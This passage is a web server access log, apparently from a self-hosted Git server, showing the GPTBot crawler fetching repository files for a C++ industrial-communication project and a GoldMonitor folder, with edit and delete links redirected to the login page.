"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:16:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12302] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12302] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:16:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor" [Client 74.7.227.38] [Length 14753] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:16:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 48281] [Gzip 12.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:16:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 30473] [Gzip 11.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:16:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 409932] [Gzip 15.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:16:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 97360] [Gzip 18.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:16:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 14123] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" +[17/Feb/2026:16:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:16:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13336] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11598] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13335] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12048] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:14:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor" +[17/Feb/2026:16:14:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor" +[17/Feb/2026:16:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log?display=source" [Client 74.7.227.38] [Length 30494] [Gzip 11.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:14:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor" +[17/Feb/2026:16:14:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:16:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13899] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor" [Client 74.7.227.38] [Length 9774] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 12721] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 141941] [Gzip 26.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 550901] [Gzip 22.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 64222] [Gzip 18.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 40430] [Gzip 16.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13924] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10684] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:14:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:14:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:14:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:14:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 9789] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 9799] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13603] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 2120] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 11996] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13924] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 